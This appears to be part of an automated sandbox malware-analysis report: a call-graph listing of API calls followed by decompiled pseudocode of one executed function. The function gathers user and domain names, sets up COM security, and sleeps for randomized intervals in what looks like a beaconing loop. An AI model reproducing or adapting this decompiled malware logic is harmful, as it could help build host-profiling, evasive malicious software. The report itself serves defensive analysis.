56921->56922 56922->56441 56926 285c809f9f0 GlobalMemoryStatusEx 56922->56926 56923 285c809d1d0 35 API calls 56923->56924 56924->56920 56924->56923 56989 285c80d19f0 25 API calls 4 library calls 56924->56989 56927 285c80c59d0 collate 4 API calls 56926->56927 56928 285c809cfdd 56927->56928 56928->56441 56929 285c809fc60 17 API calls collate 56928->56929 56929->56441 56931 285c809d1f5 swprintf 56930->56931 56934 285c80ce574 56931->56934 56935 285c80ce5c4 56934->56935 56936 285c80ce588 56934->56936 56947 285c80d3944 11 API calls _get_daylight 56935->56947 56936->56935 56939 285c80ce592 56936->56939 56938 285c80ce5bc 56948 285c80caabc 11 API calls _invalid_parameter_noinfo 56938->56948 56945 285c80cb244 35 API calls 6 library calls 56939->56945 56942 285c80ce5ab 56943 285c809d214 RegOpenKeyExW 56942->56943 56946 285c80d3944 11 API calls _get_daylight 56942->56946 56943->56614 56943->56615 56945->56942 56946->56938 56947->56938 56948->56943 56959 285c80c8ef0 56949->56959 56952 285c80a01a0 RegQueryValueExW 56954 285c80a01f1 RegCloseKey 56952->56954 56955 285c80a01cc StrStrIW 56952->56955 56953 285c80a01fc 56957 285c80c59d0 collate 4 API calls 56953->56957 56954->56953 56955->56954 56956 285c80a01df RegCloseKey 56955->56956 56956->56953 56958 285c80a020e 56957->56958 56958->56623 56960 285c80a0171 RegOpenKeyExW 56959->56960 56960->56952 56960->56953 56962 285c80a00b8 56961->56962 56963 285c80a00c8 56962->56963 56964 285c80a010e GetCurrentProcess 56962->56964 56963->56639 56965 285c80a011e 56964->56965 56965->56639 56967 285c80a042e 56966->56967 56968 285c80a043b CoInitializeSecurity 56966->56968 56967->56692 56969 285c80a0494 CoUninitialize 56968->56969 56970 285c80a0471 CoCreateInstance 56968->56970 56969->56692 56970->56969 56971 285c80a04ac SysAllocString 56970->56971 56972 285c80a050a CoSetProxyBlanket 56971->56972 56973 285c80a04c6 56971->56973 56974 285c80a0556 56972->56974 56977 285c80a053a CoUninitialize 56972->56977 56975 285c80a0504 SysFreeString 56973->56975 56976 285c80a04fc SysFreeString 56973->56976 56974->56692 56975->56972 56976->56977 56977->56974 56979->56728 56982 285c80a06a0 56980->56982 56981 285c80a06b0 56981->56731 56982->56981 56983 285c80a074e 56982->56983 56985 285c80a0766 56982->56985 56987 285c809ff70 58 API calls swprintf 56983->56987 56985->56981 56988 285c809ff70 58 API calls swprintf 56985->56988 56987->56981 56988->56981 56989->56924

                Executed Functions

                Function 00000285C8059E00 Relevance: 80.8, APIs: 23, Strings: 22, Instructions: 2002sleepstringthreadCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 30%
                			E00000285285C8059E00(void* __edx, void* __ebp, void* __esp, void* __rax, long long __rbx, void* __r8, signed int __r9, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* __r13;
				void* __r14;
				void* __r15;
				void* _t712;
				void* _t762;
				void* _t767;
				void* _t769;
				void* _t778;
				void* _t798;
				signed int _t818;
				void* _t821;
				void* _t823;
				void* _t824;
				void* _t825;
				void* _t826;
				void* _t845;
				void* _t851;
				void* _t865;
				void* _t866;
				void* _t868;
				void* _t869;
				void* _t870;
				void* _t875;
				void* _t878;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t887;
				void* _t888;
				void* _t890;
				void* _t892;
				void* _t906;
				void* _t908;
				void* _t915;
				void* _t916;
				void* _t917;
				void* _t919;
				void* _t920;
				void* _t921;
				int _t924;
				void* _t925;
				void* _t926;
				long _t932;
				void* _t943;
				void* _t948;
				void* _t950;
				void* _t953;
				void* _t954;
				void* _t955;
				void* _t956;
				void* _t957;
				void* _t958;
				void* _t959;
				void* _t960;
				void* _t961;
				void* _t963;
				void* _t965;
				signed int _t968;
				signed int _t969;
				signed int _t982;
				signed char _t988;
				signed char _t991;
				signed char _t996;
				signed char _t1003;
				signed char _t1005;
				void* _t1042;
				void* _t1257;
				signed int _t1258;
				signed long long _t1259;
				intOrPtr _t1261;
				signed long long _t1262;
				intOrPtr _t1264;
				long long _t1265;
				long long _t1267;
				intOrPtr _t1276;
				intOrPtr _t1278;
				signed long long _t1279;
				signed long long* _t1281;
				intOrPtr _t1282;
				intOrPtr _t1284;
				signed long long _t1285;
				intOrPtr _t1287;
				signed long long _t1289;
				signed long long _t1292;
				signed long long _t1294;
				signed long long _t1297;
				signed int* _t1301;
				signed long long _t1303;
				signed long long _t1306;
				signed long long _t1308;
				signed long long _t1310;
				signed long long _t1313;
				signed long long _t1315;
				signed long long _t1317;
				signed long long _t1320;
				signed long long _t1322;
				signed long long _t1325;
				signed long long _t1327;
				intOrPtr _t1333;
				intOrPtr _t1335;
				signed long long _t1336;
				long long _t1338;
				intOrPtr _t1340;
				intOrPtr _t1342;
				signed long long _t1343;
				intOrPtr _t1345;
				signed int _t1346;
				intOrPtr _t1347;
				intOrPtr _t1349;
				intOrPtr _t1350;
				intOrPtr _t1352;
				intOrPtr _t1355;
				intOrPtr _t1357;
				long long _t1358;
				intOrPtr _t1360;
				signed long long _t1362;
				intOrPtr _t1364;
				signed long long _t1368;
				signed long long _t1370;
				signed long long _t1372;
				signed long long _t1374;
				signed long long _t1376;
				void* _t1378;
				intOrPtr _t1382;
				intOrPtr _t1383;
				intOrPtr _t1387;
				intOrPtr _t1407;
				void* _t1408;
				intOrPtr _t1410;
				void* _t1411;
				intOrPtr _t1428;
				void* _t1429;
				intOrPtr _t1458;
				void* _t1459;
				intOrPtr _t1461;
				void* _t1462;
				intOrPtr _t1471;
				void* _t1472;
				intOrPtr _t1474;
				void* _t1475;
				intOrPtr _t1522;
				void* _t1523;
				intOrPtr _t1525;
				void* _t1526;
				intOrPtr _t1583;
				void* _t1584;
				intOrPtr _t1586;
				void* _t1587;
				intOrPtr _t1619;
				void* _t1620;
				intOrPtr _t1622;
				void* _t1623;
				intOrPtr _t1632;
				void* _t1633;
				intOrPtr _t1638;
				void* _t1639;
				intOrPtr _t1644;
				void* _t1645;
				intOrPtr _t1710;
				void* _t1808;
				signed long long _t1812;
				intOrPtr _t1816;
				intOrPtr _t1817;
				void* _t1818;
				long long _t1820;
				intOrPtr _t1822;
				void* _t1823;
				long long* _t1824;
				void* _t1825;
				void* _t1826;
				void* _t1900;
				void* _t1912;
				void* _t1913;
				signed long long _t1917;
				signed long long _t1918;
				signed long long _t1920;
				void* _t1921;
				long long _t1922;
				long long _t1923;
				long long _t1924;
				long long _t1925;

				_t1913 = __r11;
				_t1365 = __rbx;
				_t1257 = __rax;
				_t1824 = _t1825 - 0x980;
				_t1826 = _t1825 - 0xa80;
				 *((long long*)(_t1824 + 0x538)) = 0xfffffffe;
				 *((long long*)(_t1826 + 0xac0)) = __rbx;
				r14d = 0;
				 *(_t1824 + 0x160) = _t1918;
				 *(_t1824 + 0x168) = _t1918;
				 *(_t1824 + 0x168) = 0xf;
				 *(_t1824 + 0x160) = _t1918;
				 *(_t1824 + 0x150) = r14b;
				_t1387 =  *0xc8153378; // 0x20c
				if (_t1387 == 0) goto 0xc8059e6d;
				WaitForSingleObject(??, ??);
				if ( *0xc8153368 == 0) goto 0xc8059e91;
				_t1891 = __r9 | 0xffffffff;
				r8d = 0;
				E00000285285C8056C40(__rbx, _t1824 + 0x150, 0xc8153358, _t1808, _t1818, __r8, __r9 | 0xffffffff); // executed
				_t712 = E00000285285C809CD00(); // executed
				if (_t712 != 0) goto 0xc805c0ab;
				E00000285285C80CAE64(_t712, _t1257, _t1824 + 0x150, 0xc8153358);
				E00000285285C80CAB80(0, _t1257);
				_t1258 = _t1824 + 0x9d8;
				 *(_t1826 + 0x28) = _t1258;
				 *(_t1826 + 0x20) = r14d;
				r9d = 0;
				E00000285285C80CACE4(0, 0, _t1258, _t1365, _t1257, _t1818, 0x285c8059d90, __r9 | 0xffffffff);
				 *0xc81532b8 = _t1258;
				 *(_t1826 + 0x60) = _t1918;
				 *(_t1826 + 0x68) = _t1918;
				 *(_t1826 + 0x68) = 0xf;
				 *(_t1826 + 0x60) = _t1918;
				 *((char*)(_t1826 + 0x50)) = 0;
				if ("iKInPE9WrB" != 0) goto 0xc8059f0a;
				goto 0xc8059f1a;
				if ( *((char*)("iKInPE9WrB" + (_t1918 | 0xffffffff) + 1)) != 0) goto 0xc8059f10;
				E00000285285C8056B10(_t1365, _t1826 + 0x50, "iKInPE9WrB", _t1818, (_t1918 | 0xffffffff) + 1);
				if ( *(_t1826 + 0x60) == 0) goto 0xc805a05e;
				_t1668 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E00000285285C8051080(_t1824 + 0x650,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x4f;
				E00000285285C8051420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x650, "127.0.0.1");
				_t1671 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E00000285285C8051080(_t1824 + 0x870,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x4f;
				E00000285285C8051420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x870, 0xc814e190);
				_t1674 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E00000285285C8051080(_t1824 + 0x760,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x4f;
				E00000285285C8051420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x760, 0xc814e1e0);
				_t1677 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E00000285285C8051080(_t1824 + 0x390,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0xfff;
				E00000285285C8051290(E00000285285C8051290(E00000285285C8051290(E00000285285C8051290(E00000285285C8051420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x390, 0xc814d140), _t1824 + 0x390), _t1824 + 0x760), _t1824 + 0x870), _t1824 + 0x650);
				 *(_t1824 + 0x1a0) = _t1918;
				 *(_t1824 + 0x1a8) = _t1918;
				 *(_t1824 + 0x1a8) = 0xf;
				 *(_t1824 + 0x1a0) = _t1918;
				 *((char*)(_t1824 + 0x190)) = 0;
				if ( *0xc814e1e0 != 0) goto 0xc805a093;
				goto 0xc805a0aa;
				asm("o16 nop [eax+eax]");
				if ( *((char*)(0xc814e1e0 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0xc805a0a0;
				E00000285285C8056B10(0xc814e1e0, _t1824 + 0x190, 0xc814e1e0, 0xc814d140, (_t1918 | 0xffffffff) + 1);
				 *(_t1824 - 0x80) = _t1918;
				 *(_t1824 - 0x78) = _t1918;
				 *(_t1824 - 0x78) = 0xf;
				 *(_t1824 - 0x80) = _t1918;
				 *((char*)(_t1826 + 0x70)) = 0;
				if ( *0xc814e190 != 0) goto 0xc805a0e1;
				goto 0xc805a0ef;
				if ( *((char*)(0xc814e190 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0xc805a0e5;
				E00000285285C8056B10(0xc814e1e0, _t1826 + 0x70, 0xc814e190, 0xc814d140, (_t1918 | 0xffffffff) + 1);
				 *(_t1824 - 0x40) = _t1918;
				 *(_t1824 - 0x38) = _t1918;
				 *(_t1824 - 0x38) = 0xf;
				 *(_t1824 - 0x40) = _t1918;
				 *((char*)(_t1824 - 0x50)) = 0;
				if ( *0xc814d140 != 0) goto 0xc805a123;
				goto 0xc805a13a;
				asm("o16 nop [eax+eax]");
				if ( *((char*)(0xc814d140 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0xc805a130;
				E00000285285C8056B10(0xc814e1e0, _t1824 - 0x50, 0xc814d140, 0xc814d140, (_t1918 | 0xffffffff) + 1);
				E00000285285C80571E0(0, 0, 0xc814e1e0, _t1824 + 0xd0, 0xc814e190, 0xc814d140, _t1826 + 0x70, _t1891);
				r15d = 0x1000;
				_t1259 =  *(_t1824 - 0x38);
				if (_t1259 - 0x10 < 0) goto 0xc805a1b6;
				_t1407 =  *((intOrPtr*)(_t1824 - 0x50));
				if (_t1259 + 1 - _t1921 < 0) goto 0xc805a1b1;
				if (0 == 0) goto 0xc805a184;
				0xc80caadc();
				asm("int3");
				_t1261 =  *((intOrPtr*)(_t1407 - 8));
				if (_t1261 - _t1407 < 0) goto 0xc805a193;
				0xc80caadc();
				asm("int3");
				_t1408 = _t1407 - _t1261;
				if (_t1408 - 8 >= 0) goto 0xc805a1a2;
				0xc80caadc();
				asm("int3");
				if (_t1408 - 0x27 <= 0) goto 0xc805a1ae;
				0xc80caadc();
				asm("int3");
				0xc80c51e4();
				 *(_t1824 - 0x38) = 0xf;
				 *(_t1824 - 0x40) = _t1918;
				 *((char*)(_t1824 - 0x50)) = 0;
				_t1262 =  *(_t1824 - 0x78);
				if (_t1262 - 0x10 < 0) goto 0xc805a21a;
				_t1410 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1262 + 1 - _t1921 < 0) goto 0xc805a215;
				if (0 == 0) goto 0xc805a1e8;
				0xc80caadc();
				asm("int3");
				_t1264 =  *((intOrPtr*)(_t1410 - 8));
				if (_t1264 - _t1410 < 0) goto 0xc805a1f7;
				0xc80caadc();
				asm("int3");
				_t1411 = _t1410 - _t1264;
				if (_t1411 - 8 >= 0) goto 0xc805a206;
				0xc80caadc();
				asm("int3");
				if (_t1411 - 0x27 <= 0) goto 0xc805a212;
				0xc80caadc();
				asm("int3");
				0xc80c51e4();
				 *(_t1824 - 0x78) = 0xf;
				 *(_t1824 - 0x80) = _t1918;
				 *((char*)(_t1826 + 0x70)) = 0;
				if ( *(_t1826 + 0x60) == 0) goto 0xc805a34c;
				_t1684 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E00000285285C8051080(_t1824 + 0x390,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x50;
				E00000285285C80512A0(_t1824 + 0x390, "127.0.0.1", _t1891);
				_t1687 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E00000285285C8051080(_t1824 + 0x760,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x50;
				E00000285285C80512A0(_t1824 + 0x760, 0xc814e190, _t1891);
				_t1690 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E00000285285C8051080(_t1824 + 0x870,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = 0x50;
				E00000285285C80512A0(_t1824 + 0x870, 0xc814e1e0, _t1891);
				_t1693 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				E00000285285C8051080(_t1824 + 0x650,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				r8d = r15d;
				E00000285285C8051290(E00000285285C8051290(E00000285285C8051290(E00000285285C8051290(E00000285285C80512A0(_t1824 + 0x650, 0xc814d140, _t1891), _t1824 + 0x650), _t1824 + 0x870), _t1824 + 0x760), _t1824 + 0x390);
				 *(_t1824 + 0x1c0) = _t1918;
				 *(_t1824 + 0x1c8) = _t1918;
				 *(_t1824 + 0x1c8) = 0xf;
				 *(_t1824 + 0x1c0) = _t1918;
				 *((char*)(_t1824 + 0x1b0)) = 0;
				__imp__CoInitializeEx();
				 *(_t1826 + 0x40) = _t1918;
				 *(_t1826 + 0x38) = r14d;
				 *(_t1826 + 0x30) = _t1918;
				r13d = 3;
				 *(_t1826 + 0x28) = r13d;
				 *(_t1826 + 0x20) = r14d;
				r9d = 0;
				r8d = 0;
				__imp__CoInitializeSecurity();
				E00000285285C809A49C(_t1264, 0xc814e1e0);
				_t129 = _t1824 + 0x370; // 0x373
				E00000285285C809BE80(0, 0xc814e1e0, _t129, 0xc814e190, _t1826 + 0x70);
				_t130 = _t1824 - 0x18; // -21
				E00000285285C809BB80(0, 0xc814e1e0, _t130, 0xc814e190, _t1826 + 0x70);
				_t131 = _t1824 + 0x370; // 0x373
				_t132 = _t1824 + 0x2d8; // 0x2db
				E00000285285C80595D0(_t132, _t1264, 0xc814e190, 0xc814d140, _t1824, _t131, _t1891);
				_t1265 =  *_t1824;
				if (_t1265 - 0x10 < 0) goto 0xc805a433;
				_t1428 =  *((intOrPtr*)(_t1824 - 0x18));
				if (_t1265 + 1 - _t1921 < 0) goto 0xc805a42e;
				if (0 == 0) goto 0xc805a401;
				0xc80caadc();
				asm("int3");
				_t1267 =  *((intOrPtr*)(_t1428 - 8));
				if (_t1267 - _t1428 < 0) goto 0xc805a410;
				0xc80caadc();
				asm("int3");
				_t1429 = _t1428 - _t1267;
				if (_t1429 - 8 >= 0) goto 0xc805a41f;
				0xc80caadc();
				asm("int3");
				if (_t1429 - 0x27 <= 0) goto 0xc805a42b;
				0xc80caadc();
				asm("int3");
				0xc80c51e4();
				 *_t1824 = 0xf;
				 *(_t1824 - 8) = _t1918;
				 *((char*)(_t1824 - 0x18)) = 0;
				 *((long long*)(_t1824 + 0x558)) = _t1267;
				 *((long long*)(_t1824 + 0x560)) = _t1267;
				 *((long long*)(_t1824 + 0x568)) = _t1267;
				 *((long long*)(_t1824 + 0x570)) = _t1267;
				 *((long long*)(_t1824 + 0x578)) = _t1267;
				 *((long long*)(_t1824 + 0x580)) = _t1267;
				 *((long long*)(_t1824 + 0x588)) = _t1267;
				 *((long long*)(_t1824 + 0x590)) = _t1267;
				_t147 = _t1824 + 0x540; // 0x543
				E00000285285C80515E0(_t147);
				_t148 = _t1824 + 0x540; // 0x543
				E00000285285C80515E0(_t148);
				_t149 = _t1824 + 0x2d8; // 0x2db
				_t1697 =  >=  ?  *((void*)(_t1824 + 0x2d8)) : _t149;
				r8d =  *(_t1824 + 0x2e8);
				_t153 = _t1824 + 0x540; // 0x543
				E00000285285C8051630(_t153,  >=  ?  *((void*)(_t1824 + 0x2d8)) : _t149, _t131);
				_t154 = _t1824 + 0x540; // 0x543
				E00000285285C8053620(0xffffffff, _t154);
				_t155 = _t1824 + 0x598; // 0x59b
				_t156 = _t1824 + 0x1d0; // 0x1d3
				E00000285285C8051460(_t156, _t155, _t1913);
				_t157 = _t1824 + 0x1d0; // 0x1d3
				if (E00000285285C8097480(_t1267, 0xc814e1e0, _t157) != 0) goto 0xc805a509;
				__imp__CoUninitialize();
				TerminateThread(??, ??);
				goto 0xc805c021;
				r8d = 0;
				_t159 = _t1824 + 0x298; // 0x29b
				_t160 = _t1824 + 0x1d0; // 0x1d3
				E00000285285C805C4C0(_t1267, _t160, _t159);
				_t162 = _t1824 + 0x4f8; // 0x4fb
				_t163 = _t1824 + 0x1d0; // 0x1d3
				E00000285285C805C4C0(_t1267, _t163, _t162);
				_t164 = _t1824 + 0x220; // 0x223
				E00000285285C809C000(0, 0xc814e1e0, _t164, 0xc814e190,  *(_t1824 + 0x1e0) >> 1);
				if ( *((long long*)(_t1824 + 0x380)) == 0) goto 0xc805a5bc;
				r8d = 1;
				_t166 = _t1824 + 0x220; // 0x223
				E00000285285C8058C10(0xc814e1e0, _t166, "\n", 0xc814e190, _t1824,  *(_t1824 + 0x1e0) >> 1);
				_t167 = _t1824 + 0x370; // 0x373
				_t168 = _t1824 + 0x2b8; // 0x2bb
				E00000285285C80593D0(0xc814e1e0, _t168, "User name: ", 0xc814d140, _t1824, _t167,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffff);
				r8d = r8d ^ r8d;
				_t169 = _t1824 + 0x220; // 0x223
				_t762 = E00000285285C8058D60(0xc814e1e0, _t169, _t1267, 0xc814e190, 0xc814d140, _t1824, _t167,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
				_t170 = _t1824 + 0x2b8; // 0x2bb
				E00000285285C8056820(_t762, 0, _t170);
				_t171 = _t1824 + 0x4d8; // 0x4db
				E00000285285C809BD00(0, 0xc814e1e0, _t171, 0xc814e190, _t167);
				if ( *((long long*)(_t1824 + 0x4e8)) == 0) goto 0xc805a627;
				_t173 = _t1824 + 0x220; // 0x223
				E00000285285C8058C10(0xc814e1e0, _t173, "\n", 0xc814e190, _t1824, 0xc814d140);
				_t174 = _t1824 + 0x4d8; // 0x4db
				_t175 = _t1824 + 0x2b8; // 0x2bb
				E00000285285C80593D0(0xc814e1e0, _t175, "Domain name: ", 0xc814d140, _t1824, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
				r8d = r8d ^ r8d;
				_t176 = _t1824 + 0x220; // 0x223
				_t767 = E00000285285C8058D60(0xc814e1e0, _t176, _t1267, 0xc814e190, 0xc814d140, _t1824, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
				_t177 = _t1824 + 0x2b8; // 0x2bb
				E00000285285C8056820(_t767, 0, _t177);
				 *(_t1824 + 0x250) = _t1918;
				 *(_t1824 + 0x258) = _t1918;
				 *(_t1824 + 0x258) = 0xf;
				 *(_t1824 + 0x250) = _t1918;
				 *((char*)(_t1824 + 0x240)) = 0;
				r8d = 0;
				_t183 = _t1824 + 0x150; // 0x153
				_t184 = _t1824 + 0x240; // 0x243
				_t769 = E00000285285C8056C40(0xc814e1e0, _t184, _t183, 0xc814e190, 0xc814d140, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
				_t185 = _t1824 + 0x298; // 0x29b
				_t1709 =  >=  ?  *((void*)(_t1824 + 0x298)) : _t185;
				r8d = 0;
				_t189 = _t1824 + 0x240; // 0x243
				E00000285285C8056A20(_t769, _t189,  >=  ?  *((void*)(_t1824 + 0x298)) : _t185, _t174,  *((intOrPtr*)(_t1824 + 0x2a8)));
				 *(_t1824 + 0x9c8) = _t1267 != 0xffffffff;
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp-0x30], xmm0");
				 *(_t1824 - 0x20) = _t1918;
				asm("o16 nop [eax+eax]");
				_t968 = r14d;
				_t1710 =  *((intOrPtr*)(_t1824 + 0xd0));
				if ( *((intOrPtr*)(_t1824 + 0xd8)) - _t1710 >> 6 == 0) goto 0xc805b901;
				_t194 = (_t1918 << 6) + _t1710 + 0x20; // 0x20
				if (E00000285285C806A380(_t968, 0, 0, _t1042,  *((intOrPtr*)(_t1824 + 0xd8)) - _t1710 >> 6, 0xc814e1e0, (_t1918 << 6) + _t1710, _t194, 0xc814d140, _t1824, _t174,  *((intOrPtr*)(_t1824 + 0x2a8)), _t1912) != 0) goto 0xc805a728;
				_t969 = _t968 + 1;
				if (_t969 -  *((intOrPtr*)(_t1824 + 0xd8)) -  *((intOrPtr*)(_t1824 + 0xd0)) >> 6 < 0) goto 0xc805a6f0;
				goto 0xc805b901;
				 *0xc81530a8 = _t969;
				r12d = r14d;
				 *(_t1824 + 0x9d0) = r14d;
				_t198 = _t1824 - 0x30; // -45
				 *(_t1826 + 0x20) = _t198;
				_t200 = _t1824 + 0x220; // 0x223
				_t201 = _t1824 + 0x190; // 0x193
				_t202 = _t1824 + 0x1d0; // 0x1d3
				E00000285285C8093D60(_t198, 0xc814e1e0, _t1826 + 0x70, _t202, _t201, _t200);
				 *(_t1826 + 0x20) = _t1826 + 0x50;
				_t1900 = _t1826 + 0x70;
				_t209 = _t1824 - 0x70; // -109
				E00000285285C806A7F0(0, 0, _t1042, 1, _t969 -  *((intOrPtr*)(_t1824 + 0xd8)) -  *((intOrPtr*)(_t1824 + 0xd0)) >> 6, 0xc814e1e0, _t209, ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)), 0xffffffff, 0xc814d140, _t1824, ( *0xc81530a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20, _t1900, _t1912);
				if ( *(_t1824 - 0x60) != 0) goto 0xc805a885;
				r8d = E00000285285C80CAB54(_t1826 + 0x50);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t988 = r8d * 0x3e8;
				Sleep(??);
				_t1276 =  *((intOrPtr*)(_t1824 - 0x58));
				if (_t1276 - 0x10 < 0) goto 0xc805a813;
				_t1458 =  *((intOrPtr*)(_t1824 - 0x70));
				if (_t1276 + 1 - _t1921 < 0) goto 0xc805a80e;
				if ((_t988 & 0x0000001f) != 0) goto 0xc805b944;
				_t1278 =  *((intOrPtr*)(_t1458 - 8));
				if (_t1278 - _t1458 >= 0) goto 0xc805b93e;
				_t1459 = _t1458 - _t1278;
				if (_t1459 - 8 < 0) goto 0xc805b938;
				if (_t1459 - 0x27 > 0) goto 0xc805b932;
				0xc80c51e4();
				 *((long long*)(_t1824 - 0x58)) = 0xf;
				 *(_t1824 - 0x60) = _t1918;
				 *((char*)(_t1824 - 0x70)) = 0;
				_t1279 =  *(_t1824 - 0x78);
				if (_t1279 - 0x10 < 0) goto 0xc805a86f;
				_t1461 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1279 + 1 - _t1921 < 0) goto 0xc805a86a;
				if ((_t988 & 0x0000001f) != 0) goto 0xc805b95c;
				_t1281 =  *((intOrPtr*)(_t1461 - 8));
				if (_t1281 - _t1461 >= 0) goto 0xc805b956;
				_t1462 = _t1461 - _t1281;
				if (_t1462 - 8 < 0) goto 0xc805b950;
				if (_t1462 - 0x27 > 0) goto 0xc805b94a;
				0xc80c51e4();
				 *(_t1824 - 0x78) = 0xf;
				 *(_t1824 - 0x80) = _t1918;
				 *((char*)(_t1826 + 0x70)) = 0;
				goto 0xc805a6c0;
				if ( *(_t1826 + 0x60) == 0) goto 0xc805a8db;
				_t1718 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				_t236 = _t1824 + 0x650; // 0x653
				E00000285285C8051080(_t236,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				_t237 = _t1824 - 0x70; // -109
				_t1720 =  >=  ?  *((void*)(_t1824 - 0x70)) : _t237;
				r8d =  *(_t1824 - 0x60);
				_t241 = _t1824 + 0x650; // 0x653
				_t778 = E00000285285C8051420( *((long long*)(_t1824 - 0x58)) - 0x10, _t241,  >=  ?  *((void*)(_t1824 - 0x70)) : _t237);
				_t242 = _t1824 + 0x650; // 0x653
				E00000285285C8051290(_t778, _t242);
				 *(_t1824 + 0xf0) = _t1281;
				 *(_t1824 + 0xf8) = _t1281;
				 *((intOrPtr*)(_t1824 + 0xfe)) = r14w;
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp+0x100], xmm0");
				asm("xorps xmm1, xmm1");
				asm("movdqa [ebp+0x110], xmm1");
				asm("movdqa [ebp+0x120], xmm0");
				 *(_t1824 + 0x130) = _t1918;
				 *((long long*)(_t1824 + 0x138)) = 0x400;
				 *(_t1824 + 0x140) = r14d;
				 *(_t1824 + 0x148) = _t1918;
				if ( *(_t1824 + 0x100) != _t1281) goto 0xc805a96e;
				E00000285285C80C4DCC(_t1281, _t242);
				 *(_t1824 + 0x4c8) = _t1281;
				 *_t1281 = _t1918;
				_t1281[1] = 0x10000;
				_t1281[2] = _t1918;
				_t1281[3] = _t1918;
				_t1281[4] = _t1918;
				 *(_t1824 + 0x100) = _t1281;
				 *(_t1824 + 0x108) = _t1281;
				_t259 = _t1824 - 0x70; // -109
				_t1722 =  >=  ?  *((void*)(_t1824 - 0x70)) : _t259;
				_t262 = _t1824 + 0xf0; // 0xf3
				E00000285285C805CF30(0xc814e1e0, _t262,  >=  ?  *((void*)(_t1824 - 0x70)) : _t259, 0xc814d140);
				if (_t1281[0xa] == 0) goto 0xc805aa9a;
				r8d = E00000285285C80CAB54(_t1281);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t991 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t1824 + 0x108) == 0) goto 0xc805a9d2;
				E00000285285C805C610(0xc814e1e0,  *(_t1824 + 0x108));
				0xc80caea4();
				E00000285285C80C51EC(_t1281, 0xc814e1e0, 0xc814d140);
				_t1282 =  *((intOrPtr*)(_t1824 - 0x58));
				if (_t1282 - 0x10 < 0) goto 0xc805aa39;
				_t1471 =  *((intOrPtr*)(_t1824 - 0x70));
				if (_t1282 + 1 - _t1921 < 0) goto 0xc805aa34;
				if ((_t991 & 0x0000001f) != 0) goto 0xc805b974;
				_t1284 =  *((intOrPtr*)(_t1471 - 8));
				if (_t1284 - _t1471 >= 0) goto 0xc805b96e;
				_t1472 = _t1471 - _t1284;
				if (_t1472 - 8 < 0) goto 0xc805b968;
				if (_t1472 - 0x27 > 0) goto 0xc805b962;
				0xc80c51e4();
				 *((long long*)(_t1824 - 0x58)) = 0xf;
				 *(_t1824 - 0x60) = _t1918;
				 *((char*)(_t1824 - 0x70)) = 0;
				_t1285 =  *(_t1824 - 0x78);
				if (_t1285 - 0x10 < 0) goto 0xc805a86f;
				_t1474 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1285 + 1 - _t1921 < 0) goto 0xc805a86a;
				if ((_t991 & 0x0000001f) != 0) goto 0xc805b98c;
				_t1287 =  *((intOrPtr*)(_t1474 - 8));
				if (_t1287 - _t1474 >= 0) goto 0xc805b986;
				_t1475 = _t1474 - _t1287;
				if (_t1475 - 8 < 0) goto 0xc805b980;
				if (_t1475 - 0x27 > 0) goto 0xc805b97a;
				goto 0xc805a867;
				_t1820 =  *((intOrPtr*)(_t1824 - 0x30));
